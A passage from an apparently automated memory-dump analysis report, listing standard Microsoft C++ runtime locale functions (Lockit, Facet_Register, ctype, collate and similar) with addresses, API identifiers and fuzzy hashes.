                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F731F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 958335874-0
                                                                                                                                  • Opcode ID: 6148d17e19e669118a9c7d215c3730a9007478641af2217ef0111155a445c5d8
                                                                                                                                  • Instruction ID: 1bd6b1eccf83cee218b1dc4075e10e2a352fe4bc22eb82e7fe894fbd58258e5a
                                                                                                                                  • Opcode Fuzzy Hash: 6148d17e19e669118a9c7d215c3730a9007478641af2217ef0111155a445c5d8
                                                                                                                                  • Instruction Fuzzy Hash: 9D01C07190461ADBCF01DFE8C954AEDB77AAF85398F200D09D8116B2D0DFB49A4BCB81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F7AB6, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7ABD
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7AC7
                                                                                                                                  • int.LIBCPMT ref: 6E8F7ADE
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • numpunct.LIBCPMT ref: 6E8F7B01
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7B18
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7B38
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7B45
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3064348918-0
                                                                                                                                  • Opcode ID: f9e8fdccd7ef7ffe49bdf6f7ad5993e411d630b581c20a7a7cceb702561d282c
                                                                                                                                  • Instruction ID: 1fd04e43a713bb7a8d9228d30eaace6a3c2a33949fddfb96c6b31c266e149b74
                                                                                                                                  • Opcode Fuzzy Hash: f9e8fdccd7ef7ffe49bdf6f7ad5993e411d630b581c20a7a7cceb702561d282c
                                                                                                                                  • Instruction Fuzzy Hash: 4F01C07190061ADBCF01DFE8C854AED777AAF96398F214D09D4106B2C0EF749A4B8B81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F1AD7, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F1ADE
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F1AE8
                                                                                                                                  • int.LIBCPMT ref: 6E8F1AFF
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • ctype.LIBCPMT ref: 6E8F1B22
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F1B39
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F1B59
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F1B66
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2958136301-0
                                                                                                                                  • Opcode ID: ef77c6b4966d63c09cacda65e5b84a76770a7e221276b492e748bbb6d7c8acb9
                                                                                                                                  • Instruction ID: 2057afe0d31d52383fc93f83b2f1115f96b2c7f9e72be75b99dbd3cfa2e0a647
                                                                                                                                  • Opcode Fuzzy Hash: ef77c6b4966d63c09cacda65e5b84a76770a7e221276b492e748bbb6d7c8acb9
                                                                                                                                  • Instruction Fuzzy Hash: 9101D671904619DBCF01DBE8C5546ED7B79AF95394F110D09D4107B2C0EF749E4B8B91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F1A42, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F1A49
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F1A53
                                                                                                                                  • int.LIBCPMT ref: 6E8F1A6A
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • codecvt.LIBCPMT ref: 6E8F1A8D
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F1AA4
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F1AC4
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F1AD1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2133458128-0
                                                                                                                                  • Opcode ID: ae2f0db7674a33c6f5ff6855a267407b918b823691d5b967158aa5b0d1459ebf
                                                                                                                                  • Instruction ID: 354c60771521728602ca451080baead33746f97589350f32e13cab0830442618
                                                                                                                                  • Opcode Fuzzy Hash: ae2f0db7674a33c6f5ff6855a267407b918b823691d5b967158aa5b0d1459ebf
                                                                                                                                  • Instruction Fuzzy Hash: 3701C471940619DBCF01DBE8C5546ED7BB9AF853A8F254D09D4106B2C0DF74DD4B8B81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E90526E, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E905275
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E90527F
                                                                                                                                  • int.LIBCPMT ref: 6E905296
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • collate.LIBCPMT ref: 6E9052B9
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E9052D0
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E9052F0
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E9052FD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercollate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1767075461-0
                                                                                                                                  • Opcode ID: 2eed192637e09d88a373c38c27f39900528ac146d74d65ce819387088e01eefe
                                                                                                                                  • Instruction ID: 8c0cb8829c9d2f9dcb842a8ac23ab8b2ed956377469617eedb0abc2e88dd3758
                                                                                                                                  • Opcode Fuzzy Hash: 2eed192637e09d88a373c38c27f39900528ac146d74d65ce819387088e01eefe
                                                                                                                                  • Instruction Fuzzy Hash: CB012231900619DBCF01DBE8C844AED777AAF81368F600C0DD4106B290DF70DD4A8B80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E905303, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E90530A
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E905314
                                                                                                                                  • int.LIBCPMT ref: 6E90532B
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • messages.LIBCPMT ref: 6E90534E
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E905365
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E905385
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E905392
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 958335874-0
                                                                                                                                  • Opcode ID: 843274685affb6d2bc098e73c858a0ed6015018e3ef86f9a76d05027db0a5d40
                                                                                                                                  • Instruction ID: deb8aa9bdcdc5cdb8cc6735c6ed670858e15f3c80cd183a1fa110ae5c5832192
                                                                                                                                  • Opcode Fuzzy Hash: 843274685affb6d2bc098e73c858a0ed6015018e3ef86f9a76d05027db0a5d40
                                                                                                                                  • Instruction Fuzzy Hash: F401ED72900619DFCF01DBE8C854AEEB7B9AF85358F504D0DE8106B290DBB0DE4A8F80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F7325, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F732C
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7336
                                                                                                                                  • int.LIBCPMT ref: 6E8F734D
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • messages.LIBCPMT ref: 6E8F7370
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7387
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F73A7
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F73B4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 958335874-0
                                                                                                                                  • Opcode ID: 6d8946abbfafc9c40bfdc8b2b07d8c7c69fe468551c8a2c2cf66bd9548b56290
                                                                                                                                  • Instruction ID: 9575e5e61a4390badd4e25f0683986cac7934f083f7c7774aee7a73d61ba4d22
                                                                                                                                  • Opcode Fuzzy Hash: 6d8946abbfafc9c40bfdc8b2b07d8c7c69fe468551c8a2c2cf66bd9548b56290
                                                                                                                                  • Instruction Fuzzy Hash: A101003190061ADBCF01DBE8C944AEDBBB9BF85398F110C0AD8106B2D0DF709A0B8B80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F7B4B, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7B52
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7B5C
                                                                                                                                  • int.LIBCPMT ref: 6E8F7B73
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • numpunct.LIBCPMT ref: 6E8F7B96
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7BAD
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7BCD
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7BDA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3064348918-0
                                                                                                                                  • Opcode ID: 62d9aac8ab43bba6c502e09c440079de329dca2f8907b555afcd648bed3fa852
                                                                                                                                  • Instruction ID: c53ceb8393b6e1ad8fb1c02e28e8924dd44ce970e8b123cca8a85baafca2e198
                                                                                                                                  • Opcode Fuzzy Hash: 62d9aac8ab43bba6c502e09c440079de329dca2f8907b555afcd648bed3fa852
                                                                                                                                  • Instruction Fuzzy Hash: CD01C431900519DBCF01DBE8C954AEDB779AF95398F104D09D410AB2C0DF74D94B8B81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F70D1, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F70D8
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F70E2
                                                                                                                                  • int.LIBCPMT ref: 6E8F70F9
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • collate.LIBCPMT ref: 6E8F711C
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7133
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7153
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7160
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercollate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1767075461-0
                                                                                                                                  • Opcode ID: 8dd4ab68795b39779b7de57faeda79ba1cf029777b44b54c1716fdb435393f86
                                                                                                                                  • Instruction ID: d3072330960547199b362faec9aadacbab48c2a9231d1105a0f0f00114bc342f
                                                                                                                                  • Opcode Fuzzy Hash: 8dd4ab68795b39779b7de57faeda79ba1cf029777b44b54c1716fdb435393f86
                                                                                                                                  • Instruction Fuzzy Hash: CE01C031900629DBCB05DBE8C854AEE7B79BF85398F100D19D4106B3D0DF759A4B8B81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F703C, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7043
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F704D
                                                                                                                                  • int.LIBCPMT ref: 6E8F7064
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • collate.LIBCPMT ref: 6E8F7087
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F709E
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F70BE
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F70CB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercollate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1767075461-0
                                                                                                                                  • Opcode ID: 55ef7c9dd6b6de0c4e6d0ac31c61b1e63597cc5dea8ff30398bdeb1729b69e24
                                                                                                                                  • Instruction ID: 264cdc5e337131cf339e9bbeb1742473a471e8911adbd283bd1e28088eed1f31
                                                                                                                                  • Opcode Fuzzy Hash: 55ef7c9dd6b6de0c4e6d0ac31c61b1e63597cc5dea8ff30398bdeb1729b69e24
                                                                                                                                  • Instruction Fuzzy Hash: 6D01C071900629CBDB01DBE8C954AEEB7B9AF85398F210D09D410AB2C0DF759A4B8B91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F71FB, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7202
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F720C
                                                                                                                                  • int.LIBCPMT ref: 6E8F7223
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • ctype.LIBCPMT ref: 6E8F7246
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F725D
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F727D
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F728A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2958136301-0
                                                                                                                                  • Opcode ID: 1f127ce60920df6713edb1541b961e929026db84eb92eb12b029d0ae222fcbec
                                                                                                                                  • Instruction ID: e247fed4c3f7dca50aa7dbcf80a409e2c6dd58ccca5fd89bf62d336557d77251
                                                                                                                                  • Opcode Fuzzy Hash: 1f127ce60920df6713edb1541b961e929026db84eb92eb12b029d0ae222fcbec
                                                                                                                                  • Instruction Fuzzy Hash: 3401C03190061ACFDF01DBE8C954AED777ABF953A8F104D09E4116B2C0EFB49A4B8B91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F7166, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F716D
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7177
                                                                                                                                  • int.LIBCPMT ref: 6E8F718E
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • ctype.LIBCPMT ref: 6E8F71B1
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F71C8
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F71E8
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F71F5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2958136301-0
                                                                                                                                  • Opcode ID: 61883fc5aa5009a8ff41e77d5df48e72ef902dad1a2e25938c11b7e42595240e
                                                                                                                                  • Instruction ID: 66861b4c4daa53462445daf66dd568f8a41f57f35afe14351c776ccdc441471b
                                                                                                                                  • Opcode Fuzzy Hash: 61883fc5aa5009a8ff41e77d5df48e72ef902dad1a2e25938c11b7e42595240e
                                                                                                                                  • Instruction Fuzzy Hash: 30010031900619CBDF01DBE8C954AEDBBBAAF91398F114D09D4106B2C0DF709A4B8B80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8FE16B, Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3_GS.LIBCMT ref: 6E8FE172
                                                                                                                                  • _Maklocstr.LIBCPMT ref: 6E8FE1DB
                                                                                                                                  • _Maklocstr.LIBCPMT ref: 6E8FE1ED
                                                                                                                                  • _Maklocchr.LIBCPMT ref: 6E8FE205
                                                                                                                                  • _Maklocchr.LIBCPMT ref: 6E8FE215
                                                                                                                                  • _Getvals.LIBCPMT ref: 6E8FE237
                                                                                                                                    • Part of subcall function 6E8F688C: _Maklocchr.LIBCPMT ref: 6E8F68BB
                                                                                                                                    • Part of subcall function 6E8F688C: _Maklocchr.LIBCPMT ref: 6E8F68D1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3549167292-0
                                                                                                                                  • Opcode ID: 8600820448067cb0dd03198f472609bb8880dff0a8404b35a4a2e98b30a60a6a
                                                                                                                                  • Instruction ID: feea8bc94a24eab6035c6be7887af6534faf9f5e9c750b764e7b2cb37d91e825
                                                                                                                                  • Opcode Fuzzy Hash: 8600820448067cb0dd03198f472609bb8880dff0a8404b35a4a2e98b30a60a6a
                                                                                                                                  • Instruction Fuzzy Hash: 62216D71C00318EBDF149FE9D844ACE7BACAF04394F00895AB9149F281EB70D641CBE1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F74E4, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F74EB
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F74F5
                                                                                                                                  • int.LIBCPMT ref: 6E8F750C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7546
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7566
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7573
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 25fad046ceb2f7b5a008cadd37196c78755ddaeeb5d3a4833d2a29d63f13869d
                                                                                                                                  • Instruction ID: 34f9cb2eb7e1a53f49ae4d7b180456944fb66bd3ca719060b5c60e0a9faa813f
                                                                                                                                  • Opcode Fuzzy Hash: 25fad046ceb2f7b5a008cadd37196c78755ddaeeb5d3a4833d2a29d63f13869d
                                                                                                                                  • Instruction Fuzzy Hash: D701AD31900619DBCF01DFE8C9946ED77BABF893A8F104D09D4106B2D0DB749A4B8B81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F1C01, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F1C08
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F1C12
                                                                                                                                  • int.LIBCPMT ref: 6E8F1C29
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F1C63
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F1C83
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F1C90
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 5a6457df432cc98f853bdf4401d9c4f0d01b87e6d92241c7b93ab68ebec466c9
                                                                                                                                  • Instruction ID: 687f0951bfd0439b76c408f6957bb9d76060093753be17834022809df6ba4f4d
                                                                                                                                  • Opcode Fuzzy Hash: 5a6457df432cc98f853bdf4401d9c4f0d01b87e6d92241c7b93ab68ebec466c9
                                                                                                                                  • Instruction Fuzzy Hash: 3001C071900629DBCF01DBE8C9946EE7BBAAF953A8F214D09D4106B2D0DF74994B8B81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E90542D, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E905434
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E90543E
                                                                                                                                  • int.LIBCPMT ref: 6E905455
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E90548F
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E9054AF
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E9054BC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 2e3d9b5e614596478b2d58c0a03dd3d4266507f849a0fff731bdc97f97e7be01
                                                                                                                                  • Instruction ID: ab319acd7c58b8e86f78001e60258415b5bd8c7d68848f3722878d30224a8a3b
                                                                                                                                  • Opcode Fuzzy Hash: 2e3d9b5e614596478b2d58c0a03dd3d4266507f849a0fff731bdc97f97e7be01
                                                                                                                                  • Instruction Fuzzy Hash: 5401AD7190061ADBCF11DBE8C994AEDB7BAAF95368F500D0DE4106B390DB74DD468B81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F744F, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
